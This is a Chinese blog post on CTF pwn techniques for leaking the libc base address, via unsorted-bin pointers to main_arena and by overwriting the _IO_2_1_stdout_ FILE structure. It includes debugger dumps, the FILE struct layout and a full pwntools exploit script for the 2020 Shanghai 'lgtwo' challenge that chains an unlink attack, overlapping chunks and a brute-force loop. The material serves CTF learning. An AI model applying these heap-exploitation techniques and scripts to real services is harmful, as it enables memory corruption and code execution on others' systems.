CTF泄漏libc基址的方法

最新推荐文章于 2026-03-26 14:34:04 发布
原创 最新推荐文章于 2026-03-26 14:34:04 发布 · 4.5k 阅读 · 15 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#CTF #libc #基址 #IO_FILE
本文介绍了两种在CTF比赛中泄露libc基址的方法:main_arena泄漏法和IO_FILE泄漏法。main_arena泄漏法通过malloc_trim()找到unsorted bin中chunk的bk和fd来获取libc基址。IO_FILE泄漏法则通过控制_IO_list_all链表中的FILE结构体,修改_IO_write_base,利用puts或printf泄露libc地址。

泄漏libc

重点: glibc 的后三位是固定的

main_arena泄漏法

main_arena存储在libc.so.6文件的.data段,通过这个偏移我们就可以获取libc的基址,使用IDA打开libc文件,然后搜索函数malloc_trim()

在这里插入图片描述

在这里插入图片描述
在这里插入图片描述

  1. unsorted bin中第一个chunk的bk和最后一个chunk的fd都指向main_arena+48(32位)或main_arena+88(64位)的位置

  2. 所以只需要将chunk释放到unsorted bin便可以泄漏libc的地址

IO_FIlE泄漏法

参考资料:
https://wiki.x10sec.org/pwn/linux/io_file/exploit-in-libc2.24-zh/
https://b0ldfrev.gitbook.io/note/pwn/iofile-li-yong-si-lu-zong-jie

  1. 控制指针指向libc的内存区域

  2. libc中全局变量_IO_list_all是个链表,其中含有三个FILE结构体

    _IO_2_1_stderr_

    _IO_2_1_stdout

    _IO_2_1_stdin_

  3. _IO_2_1_stdout_ 低三字节是0x620,倒数第四字节可以爆破,例如设成0x2620持续攻击,总会有随机到0x2620的时候

  4. 修改FILE结构体如下,输出的时候会输出_IO_write_base指向的位置,默认_IO_write_base指向 _shortbuf,将_IO_write_base 低两字节改为\x20会打印_IO_2_1_stdout_ 本身,其中会包含、_IO_write_base 对应的值就是_IO_2_1_stdout_ 在libc中的地址

    _flags = 0xfbad1800

    _IO_read_ptr = 0

    _IO_read_end = 0

    _IO_read_base = 0

    _IO_write_base = _IO_write_base &0xffffffffffffff00+0x20

  5. 调用puts或printf后收到的数据如下,会泄漏libc地址如下

    00000000位置是_flags

    00000020位置是_IO_write_base ->_IO_2_1_stdout_

    [DEBUG] Received 0x127 bytes:
    00000000  00 18 ad fb  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    00000010  00 00 00 00  00 00 00 00  00 00 00 00  00 00 00 00  │····│····│····│····│
    00000020  20 26 2b 70  6e 7f 00 00  a3 26 2b 70  6e 7f 00 00  │ &+p│n···│·&+p│n···│
    00000030  a3 26 2b 70  6e 7f 00 00  a3 26 2b 70  6e 7f 00 00

    _IO_write_base 默认指向_IO_2_1_stdout_+131的位置,把_IO_write_base 的值的最后两个字节改成0x20就是_IO_2_1_stdout_在libc中的地址

    pwndbg> p _IO_2_1_stdout_
$1 = {
  file = {
    _flags = -72537977, 
    _IO_read_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_read_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_read_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_write_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_write_ptr = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_write_end = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_buf_base = 0x7ffff7dd26a3 <_IO_2_1_stdout_+131> "\n", 
    _IO_buf_end = 0x7ffff7dd26a4 <_IO_2_1_stdout_+132> "", 
    _IO_save_base = 0x0, 
    _IO_backup_base = 0x0, 
    _IO_save_end = 0x0, 
    _markers = 0x0, 
    _chain = 0x7ffff7dd18e0 <_IO_2_1_stdin_>, 
    _fileno = 1, 
    _flags2 = 0, 
    _old_offset = -1, 
    _cur_column = 0, 
    _vtable_offset = 0 '\000', 
    _shortbuf = "\n", 
    _lock = 0x7ffff7dd3780 <_IO_stdfile_1_lock>, 
    _offset = -1, 
    _codecvt = 0x0, 
  _wide_data = 0x7ffff7dd17a0 <_IO_wide_data_1>, 
    _freeres_list = 0x0, 
    _freeres_buf = 0x0, 
    __pad5 = 0, 
    _mode = -1, 
    _unused2 = '\000' <repeats 19 times>
  }, 
  vtable = 0x7ffff7dd06e0 <_IO_file_jumps>
}
pwndbg> p/x &_IO_2_1_stdout_
$2 = 0x7ffff7dd2620

    //64位IO_FILE_plus结构体中的偏移
    0x0   _flags
    0x8   _IO_read_ptr
    0x10  _IO_read_end
    0x18  _IO_read_base
    0x20  _IO_write_base
    0x28  _IO_write_ptr
    0x30  _IO_write_end
    0x38  _IO_buf_base
    0x40  _IO_buf_end
    0x48  _IO_save_base
    0x50  _IO_backup_base
    0x58  _IO_save_end
    0x60  _markers
    0x68  _chain
    0x70  _fileno
    0x74  _flags2
    0x78  _old_offset
    0x80  _cur_column
    0x82  _vtable_offset
    0x83  _shortbuf
    0x88  _lock
    0x90  _offset
    0x98  _codecvt
    0xa0  _wide_data
    0xa8  _freeres_list
    0xb0  _freeres_buf
    0xb8  __pad5
    0xc0  _mode
    0xc4  _unused2
    0xd8  vtable

    struct _IO_FILE {
  int _flags;        /* High-order word is _IO_MAGIC; rest is flags. */
#define _IO_file_flags _flags

  /* The following pointers correspond to the C++ streambuf protocol. */
  /* Note:  Tk uses the _IO_read_ptr and _IO_read_end fields directly. */
  char* _IO_read_ptr;    /* Current read pointer */
  char* _IO_read_end;    /* End of get area. */
  char* _IO_read_base;    /* Start of putback+get area. */
  char* _IO_write_base;    /* Start of put area. */
  char* _IO_write_ptr;    /* Current put pointer. */
  char* _IO_write_end;    /* End of put area. */
  char* _IO_buf_base;    /* Start of reserve area. */
  char* _IO_buf_end;    /* End of reserve area. */
  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
#if 0
int _blksize;
#else
  int _flags2;
#endif
  _IO_off_t _old_offset; /* This used to be _offset but it's too small.  */

#define __HAVE_COLUMN /* temporary */
  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  /*  char* _save_gptr;  char* _save_egptr; */

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

2020上海大学生网络安全赛lgtwo题的exp:
其他人的exp:exp

from pwn import *
import time

def exp():
  context.update(arch='amd64',os='linux',log_level='DEBUG')

  se      = lambda data               :r.send(data) 
  sa      = lambda delim,data         :r.sendafter(delim, data)
  sl      = lambda data               :r.sendline(data)
  sla     = lambda delim,data         :r.sendlineafter(delim, data)
  sea     = lambda delim,data         :r.sendafter(delim, data)
  rc      = lambda numb=4096          :r.recv(numb)
  rl      = lambda                    :r.recvline()
  ru      = lambda delims			    :r.recvuntil(delims)
  uu32    = lambda data               :u32(data.ljust(4, '\0'))
  uu64    = lambda data               :u64(data.ljust(8, '\0'))
  info_addr = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))

  def debug(cmd=''):
  	time.sleep(1)
  	gdb.attach(r,cmd)
  	time.sleep(1)

  	    
  def msg(msg,addr):
  	log.warn(msg + "--> " + hex(addr))

  '''
  >> 1
  size?
  20
  content?
  123
  '''
  def add(size,content='a'):
  	sla(">> ","1")
  	sla("size?\n",str(size))
  	sea("content?\n",content)

  '''
  >> 4
  index ?
  0
  what is your new content ?
  123
  '''
  def edit(index,content):
  	sla(">> ","4")
  	sla("index ?\n",str(index))
  	sea("what is your new content ?\n",content)


  '''
  >> 2
  index ?
  0
  '''
  def free(index):
  	sla(">> ","2")
  	sla("index ?\n",str(index))
  pe = "./pwn"
  
  debug = True
  elf = ELF(pe)
  if debug:
  	libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
  	r = process(pe)
  else:
  	libc = ELF('./libc.so')
  	r = process(pe)

  #r = remote('192.168.0.1',20173)
  array_addr = 0x00000000006020C0 #buf

  #unlink attack
  add(0x68)#0
  add(0x90)#1

  payload = p64(0)\
  		+ p64(0x60)\
  		+ p64(array_addr-0x18)\
  		+ p64(array_addr-0x10)\
  		+ 'a'*0x40\
  		+ p64(0x60)\
  		+ b'\xa0'
  edit(0,payload)
  free(1)


  #point to same chunk
  add(0x68)#1
  add(0x40)#2
  add(0x40)#3

  edit(1,'a'*0x68+b'\xa1')
  free(2)

  add(0x48)#2
  add(0x40)#4->3
  add(0x40)#5
  add(0x40)#6

  #array[1]=main_arean+88
  edit(2,'a'*0x48+b'\xa1')
  free(4)
  edit(3,p64(0)+p64(array_addr-0x8)) #array[1]=main_arean+88
  add(0x90)#4

  #brute std_out
  edit(0,p64(0)*3+p64(array_addr)+p16(0x2620))
  edit(1,p64(0xfbad1800)+p64(0)*3+b'\x20')
  
  ret = u64(rc(8))
  if ret!=0xfbad1800:
  	log.warn(hex(ret))
  	r.close()
  	return
  
  log.success("success")
  rc(0x18)
  stdout_addr = u64(rc(8))
  msg("stdout",stdout_addr)
  libc.address = stdout_addr-libc.symbols['_IO_2_1_stdout_']
  msg("libc base",libc.address)

  r.interactive()

while True:
  try:
  	exp()
  	#break
  except:
  	log.warn("Error")
【BUUCTF】roarctf_2019_realloc_magic---从一道题认识realloc函数+stdout泄露libc地址实战
Assassin
09-18 2392
realloc好题
[HarekazeCTF2019]baby_rop2 1(含libc.so.6文件)(一些问题有待解决)
weixin_52111404的博客
12-11 1381
题时遇到了不少问题,有些还没有得到解决,在此进行记录
Linux x86 漏洞利用-Use-After-Free(UAF)-释放后可重用
z190814412的博客
01-08 5706
Use-After-Free 先决条件 Off-By-One漏洞(基于堆) 理解glibc malloc VM设置:Fedora 20(x86) 什么是释放后可重用(UaF)? 继续使用已经释放的堆内存指针称为use-after-free bug !! 此错误可能导致任意代码执行。 易受攻击的代码: #include &amp;lt;stdio.h&amp;gt; #include &amp;lt;string....
JVM 调优之 glibc 引发的内存泄露
m0_38017860的博客
12-28 1402
回顾上篇文章 JVM调优之G1换CMS 中 我们将 G1 换成 CMS 并调整了 JVM 参数,由于 GC 选择和参数设置的更加合理,所以内存的增长非常缓慢了。但这并没有从根本解决问题,通过观察发现,最高的时候一天 RSS 会增长 100M 左右,而且整体的趋势仍然是向上增长的,并没有一丝的回落迹象。问题分析虽然增长缓慢,哪怕每天只有 1M,离 OOM 也只是时间问题。这就使我们不得不再次仔细分析为什么 RSS 会一直增长。堆内存分析通过监控发现,堆内存呈周期性的增长和回收,与我们的 JVM 参数
pwn 堆溢出之 泄露基址
qq_41071646的博客
04-25 3485
先声明一下本文的参考链接 https://blog.csdn.net/weixin_34050005/article/details/86881709?tdsourcetag=s_pctim_aiomsg 这篇博客写的非常好 受教了 本来其实我是看的另一道题 但是那道题 感觉并不是很适合我这种萌新 然后我就看到了这道题 就 由于这个篇文章写的很清楚 而且 代码直接就可以拿到f...
堆基础-glibc_malloc_threading
qq_43390703的博客
11-16 594
glibc_malloc_threading 多线程支持 linux早期使用dlmalloc作为默认分配器,在dlmalloc中只有一个线程能访问临界区(critical section),因为所有线程共享freelist的数据结构。在ptmalloc2中当两个线程同时调用malloc的时候,内存均会得以分配,因为每个线程都维护着单独的堆段,因此维护这些堆的freelist数据结构也是分开的。这种为每个线程维护单独的堆和空闲列表数据结构的行为称为每个线程领域(per thread arena)。 分析案例
快速定位libc函数偏移的实用工具指南
fern8的博客
02-28 833
本文为二进制安全研究者和CTF选手提供了一份快速定位libc函数偏移的实用工具指南。详细介绍了如何利用libc.blukat.me等在线查询工具和LibcSearcher、one_gadget等本地脚本,高效获取关键函数偏移,从而加速ROP攻击链的构建与漏洞利用过程,显著提升工作效率。
BUUCTF PWN入门:babyheap_0ctf_2017堆溢出漏洞实战解析(附完整EXP)
weixin_29001683的博客
03-18 176
本文详细解析了BUUCTF PWN入门题目babyheap_0ctf_2017的堆溢出漏洞利用过程,包括fastbin attack和unsorted bin leak技术。通过实战演示如何泄露libc地址并劫持__malloc_hook获取shell,附完整EXP代码和调试技巧,适合CTF初学者学习堆漏洞利用。
moectf-pwn(2023-2025)
2402_89112669的博客
02-11 971
挺适合新手的,题目来源西电终端,有些题目没有文件,环境有问题的写不了,就没有wp。
Canary 绕过与格式化字符串利用
最新发布
ke188的博客
03-26 459
核心定义:Canary(金丝雀)是一种用于检测栈溢出攻击的安全机制。工作原理在函数开始处,程序会随机生成一个值(Canary),并放置在局部变量和rbp(栈底指针)之间。在函数返回 (ret) 之前,程序会检查这个值是否被篡改。致命报错显著特征:在 x86/x64 Linux 下,Canary 的最低位字节通常是\x00(为了截断字符串输出函数)。想象你在雷区前撒了一把面粉(Canary)。黑客如果想通过栈溢出踩到远处的返回地址(RIP),就不可避免地会踩乱这把面粉。
【PWN学习】如何获取libc基址
热门推荐
Morphy_Amo的博客
12-09 1万+
在解pwn题的时候,如果程序中没有可以获得shell的函数,通常会通过got表中调用函数来获取libc基址,然后通过libc获取要用的system函数和binsh字符。
IO_FILE Exploitation
azraelxuemo的博客
04-11 1677
文章目录简介IO_FILE结构_IO_FILEIO_jump_t图示利用原理exit函数vtable checkexit函数的广泛性exit函数exit调用__run_exit_handlersRUN_HOOK__run_exit_handlers调用_IO_cleanup_IO_cleanup调用_IO_unbuffer_all例题hctf2018_the_end题目分析伪造vtable修改vtable地址为我们伪造的区域attackdlfini 简介 IO_FILE Exploitation也是ctf
CTF中关于pwn题如何加载目标libc方法
weixin_30345577的博客
09-20 1003
问题:在做pwn题的过程中,我们经常会遇到题目提供libc,但是本地调试的时候加载的是本地libc。 解决方法方法1: 可以用添加环境变量的方法,如下:    export LD_LIBRARY_PATH=`pwd` #当前目录为加载目录export LD_PRELOAD=你的libc #加载本地pwn题目下的libc 最后不用了在:unset LD_PRELOAD #调...
2021-10-13
weixin_42338542的博客
10-13 1887
babyheap_0ctf总体思路1.通过unsortbin 来leak main_arena进而可以得到malloc_hook的地址2.通过fastbin attack来控制malloc_hook-0x23的地址块新的改变 总体思路 1.通过unsortbin 来leak main_arena进而可以得到malloc_hook的地址 2.通过fastbin attack来控制malloc_hook-0x23的地址块 新的改变 add(0x80) #0 add(0x80) #1 add(0x80) #2 a
ctf】 关于确定靶机上的libc版本
qq_31808893的博客
02-07 707
记录一下经验,有时候通过泄露的单一地址 如 puts printf 等用工具查或者手动查会查出很多libc版本,一个个试是一种办法,不过有一种方法可以更精确确定libc版本。
CTF中的PWN——绕NX防护2(泄露libc + 栈溢出)
壊壊的诱惑你的博客
10-23 2119
前言: 继续PWN的学习,今天整理一下绕过NX,同时libc本地不存在需要通过相应函数泄露地址的方式进行进行溢出。 本题工具介绍: LibcSearcher 一个基于libc_database写的python库,可以通过泄露的函数实际地址查找对应的libc版本。 from LibcSearcher import * #第二个参数,为已泄露的实际地址,或最后12...
泄漏libc基地址
yjh_fnu_ltn的博客
06-01 2240
这里可以利用vulnerable_function函数进行栈溢出,利用write函数泄漏write函数的地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢出得到write函数的地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
linux软件崩溃日志,打败Linux系统中的Bug
weixin_42298164的博客
05-09 602
调试zSeries上的Linux应用程序类似于调试其他体系结构上的Linux应用程序。对于有经验的Linux开发人员,最大的挑战是理解新的系统体系结构。对于刚接触Linux的大型机开发人员,掌握新的调试工具似乎是一项令人畏惧的任务。不要害怕。本文将提供一些有用的提示来帮助您入门。学问来自实践,但是对于调试工具,在没有出现问题而迫使您去修复它们之前,“实践”是不会发生的。考虑到这点,下面将提供让您入...
r0pbaby——ret2libc
qq_41560595的博客
10-09 666
解题思路 使用libc.so.6获取里面的system和/bin/sh地址 先查看libc.so.6: libc.so.6是libc-2.27.so的软链接,需要把libc-2.27.so拷出来。 把libc-2.27.so拖到IDA中,在左侧窗口中任意单击一个函数,快捷键ctrl+f,输入system,查看其地址。 快捷键shift+f12调出字符串窗口,单击任意处按快捷键ctrl+f,输入/bin/sh,获得地址。 栈图 如图,当rsp指向pop rax;pop rdi;call rax时,ri
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt
Y_peak的博客
03-17 929
[BUUCTF-pwn]——wdb_2018_2nd_easyfmt 一个简单的格式化字符串利用问题 泄露出got表地址,找到libc基地址 寻找system的实际地址 将printf_got修改为system的地址 写入”/bin/sh" exploit from pwn import * from LibcSearcher import * context.log_level = "debug" p = remote('node3.buuoj.cn',25125) #p = process("./
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值